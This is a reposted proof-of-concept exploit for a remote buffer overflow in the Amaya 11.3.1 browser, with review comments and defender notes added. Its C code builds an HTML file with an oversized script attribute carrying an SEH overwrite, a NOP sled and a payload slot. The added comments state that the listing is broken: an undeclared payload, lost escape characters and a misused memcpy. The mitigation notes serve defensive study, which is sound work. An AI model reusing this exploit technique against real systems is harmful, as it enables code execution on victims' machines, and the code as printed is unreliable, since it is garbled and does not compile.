
Amaya 11.3.1(dec 9 2009) remote buffer overflow (poc)

Posted on 21 May 2010

/*
 * =====================================================
 * Amaya 11.3.1(dec 9 2009) remote buffer overflow (poc)
 * =====================================================
 * Source: Inj3ct0r.com [2010-05-21]
 *
 * What the program does, as far as the listing shows: it writes a local file
 * "shit.html" consisting of an opening <script> tag whose `defer` attribute
 * carries a 12996-byte value, followed by a closing suffix. According to the
 * title, Amaya 11.3.1 overflows a buffer when it parses such a document; the
 * listing itself does not show the vulnerable parser code.
 *
 * NOTE(review): the listing is incomplete and does not compile as published:
 *   - `calc` is referenced in main() but never declared; the page has no payload.
 *   - The string literals appear to have lost their backslash characters when
 *     the page was rendered; they are reproduced here exactly as shown.
 *   - One memcpy() call passes the integer `seh` where a pointer is expected.
 *   - <stdlib.h> (rand) and <string.h> (memcpy, memset, strlen) are not included.
 *
 * Defender notes:
 *   - The observable artefact is an HTML document with one attribute value of
 *     roughly 13 KB on a <script> element. Attribute-length limits in a content
 *     filter or proxy are a reasonable detection and blocking point.
 *   - The names `seh`/`nseh` suggest the author targeted a Windows structured
 *     exception handler record. If so, SafeSEH, SEHOP, DEP and ASLR are the
 *     relevant platform mitigations (confirm against the affected build).
 *   - The page names no fixed version; do not open untrusted HTML in the
 *     affected Amaya build.
 */
#include<stdio.h>
/*Amaya 11.3.1(dec 9 2009) remote buffer overflow(poc)*/

/* Fixed 32-bit constant copied into the generated buffer by main().
 * NOTE(review): presumably an address valid only on the author's test system,
 * which would tie the PoC to one exact module build. Confirm. */
unsigned int seh=0x7C902783; ;

/* Declared but never referenced anywhere in the listing. */
char nseh[]="xebx04x90x90";

/*
 * Fill s[0..len-1] with characters drawn from a 62-character alphanumeric
 * table and store a terminating 0 at s[len].
 *
 * The caller must supply at least len + 1 bytes. No srand() call is visible
 * in the listing, so rand() produces its default sequence on every run.
 */
void gen_random(char *s, const int len) {
    int i;
    static const char alphanum[] ="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
    for(i=0;i<len;i++) {
        /* sizeof - 1 excludes the table's own terminating NUL from the draw. */
        s[i]=alphanum[rand()%(sizeof(alphanum)-1)];
    }
    s[len]=0;
}

/* Prefix and suffix written around the generated attribute value.
 * Both literals are malformed as published (see the header note). */
char html[]="<script defer="";
char end[]="">";

/*
 * Build the test document: prefix, 12996 generated bytes, suffix.
 * Returns 0; none of the I/O calls are checked for failure.
 */
int main(){
    /* fopen() result is used without a NULL check. */
    FILE*f=fopen("shit.html","wb");
    char buffer[100000];
    fwrite(html,1,sizeof(html)-1,f);
    /* Writes 12996 filler characters plus a NUL at index 12996. */
    gen_random(buffer,12996);
    /* Copies the 4 bytes of `seh` to offset 11266. */
    memcpy(buffer+11266,&seh,4);
    /* The source argument here is the integer `seh`, not a buffer. */
    memcpy(buffer+11262,seh,4);
    /* Sets offsets 11266..11275 to 0x90, which also overwrites the 4 bytes
     * copied from &seh two statements earlier. */
    memset(buffer+11266,0x90,10);
    /* `calc` is not declared anywhere in the listing. */
    memcpy(buffer+11276,calc,strlen(calc));
    /* Only the first 12996 bytes are written; the NUL terminator is not. */
    fwrite(buffer,1,12996,f);
    fwrite(end,1,sizeof(end)-1,f);
    fclose(f);
    printf("done");
    /* Waits for a key press before exiting. */
    getchar();
    return 0;
}

 
